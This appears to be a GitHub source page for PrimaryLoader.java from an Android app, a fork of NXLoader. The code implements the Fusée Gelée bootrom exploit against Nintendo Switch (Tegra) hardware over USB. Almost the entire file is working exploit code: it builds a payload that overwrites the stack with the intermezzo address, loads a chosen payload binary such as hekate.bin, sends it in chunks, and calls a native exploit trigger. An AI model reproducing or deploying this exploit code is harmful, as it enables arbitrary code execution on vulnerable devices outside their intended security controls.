forked from DavidBuchanan314/NXLoader
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathPrimaryLoader.java
155 lines (130 loc) · 5.7 KB
/
PrimaryLoader.java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
package io.github.annson24.nxloader;
/*
* This exploit is based on fusée gelée: https://github.com/reswitched/fusee-launcher
*/
import android.content.Context;
import android.content.SharedPreferences;
import android.hardware.usb.UsbDevice;
import android.hardware.usb.UsbDeviceConnection;
import android.hardware.usb.UsbEndpoint;
import android.hardware.usb.UsbInterface;
import android.hardware.usb.UsbManager;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.ByteBuffer;
import java.nio.ByteOrder;
public class PrimaryLoader implements USBDevHandler {
private static final int RCM_PAYLOAD_ADDR = 0x40010000;
private static final int INTERMEZZO_LOCATION = 0x4001F000;
private static final int PAYLOAD_LOAD_BLOCK = 0x40020000;
private static final int MAX_LENGTH = 0x30298;
// Used to load the 'native-lib' library on startup.
static {
System.loadLibrary("native-lib");
}
public void handleDevice(Context context, UsbDevice device) {
Logger.log(context, "[+] Launching primary payload!!!");
UsbManager mUsbManager = (UsbManager) context.getSystemService(Context.USB_SERVICE);
UsbInterface intf = device.getInterface(0);
UsbEndpoint endpoint_in = intf.getEndpoint(0);
UsbEndpoint endpoint_out = intf.getEndpoint(1);
UsbDeviceConnection conn = mUsbManager.openDevice(device);
conn.claimInterface(intf, true);
/* Step 1: Read device ID */
byte[] deviceID = new byte[16];
if (conn.bulkTransfer(endpoint_in, deviceID, deviceID.length, 999) != deviceID.length) {
Logger.log(context, "[-] Failed to read device ID, bailing out :(");
return;
}
Logger.log(context, "[+] Read device ID: " + Utils.bytesToHex(deviceID));
/* Step 2: Start building payload */
ByteBuffer payload = ByteBuffer.allocate(MAX_LENGTH);
payload.order(ByteOrder.LITTLE_ENDIAN);
payload.putInt(MAX_LENGTH);
payload.put(new byte[676]);
// smash the stack with the address of the intermezzo
for (int i = RCM_PAYLOAD_ADDR; i < INTERMEZZO_LOCATION; i += 4) {
payload.putInt(INTERMEZZO_LOCATION);
}
byte[] intermezzo;
try {
InputStream intermezzoStream = context.getAssets().open("intermezzo.bin");
intermezzo = new byte[intermezzoStream.available()];
intermezzoStream.read(intermezzo);
intermezzoStream.close();
} catch (IOException e) {
Logger.log(context, "[-] Failed to read intermezzo: " + e.toString());
return;
}
payload.put(intermezzo);
// pad until payload
payload.put(new byte[PAYLOAD_LOAD_BLOCK - INTERMEZZO_LOCATION - intermezzo.length]);
// write the actual payload file
try {
payload.put(getPayload(context));
} catch (IOException e) {
Logger.log(context, "[-] Failed to read payload: " + e.toString());
return;
}
int unpadded_length = payload.position();
payload.position(0);
// always end on a high buffer
boolean low_buffer = true;
byte[] chunk = new byte[0x1000];
int bytes_sent;
for (bytes_sent = 0; bytes_sent < unpadded_length || low_buffer; bytes_sent += 0x1000) {
payload.get(chunk);
if (conn.bulkTransfer(endpoint_out, chunk, chunk.length, 999) != chunk.length) {
Logger.log(context, "[-] Sending payload failed at offset " + Integer.toString(bytes_sent));
return;
}
low_buffer ^= true;
}
Logger.log(context, "[+] Sent " + Integer.toString(bytes_sent) + " bytes");
// 0x7000 = STACK_END = high DMA buffer address
switch (nativeTriggerExploit(conn.getFileDescriptor(), 0x7000)) {
case 0:
Logger.log(context, "[+] Exploit triggered!");
break;
case -1:
Logger.log(context, "[-] SUBMITURB failed :(");
break;
case -2:
Logger.log(context, "[-] DISCARDURB failed :(");
break;
case -3:
Logger.log(context, "[-] REAPURB failed :(");
break;
case -4:
Logger.log(context, "[-] Wrong URB reaped :( Maybe that doesn't matter?");
break;
default:
Logger.log(context, "[-] How did you get here!?");
return;
}
conn.releaseInterface(intf);
conn.close();
}
private byte[] getPayload(Context context) throws IOException {
SharedPreferences prefs = context.getSharedPreferences("config", Context.MODE_MULTI_PROCESS);
String payload_name = prefs.getString(Constants.PREFERENCES_KEY, null);
InputStream payload_file;
if (payload_name == null) {
Logger.log(context, "[*] Opening default payload (hekate.bin)");
payload_file = context.getAssets().open("hekate.bin");
} else {
Logger.log(context, "[*] Opening custom payload (" + payload_name + ")");
payload_file = new FileInputStream(context.getFilesDir().getPath() + "/payload.bin");
}
byte[] payload_data = new byte[payload_file.available()];
Logger.log(context, "[+] Read " + Integer.toString(payload_file.read(payload_data)) + " bytes from payload file");
payload_file.close();
return payload_data;
}
/**
* A native method that is implemented by the 'native-lib' native library,
* which is packaged with this application.
*/
public native int nativeTriggerExploit(int fd, int length);
}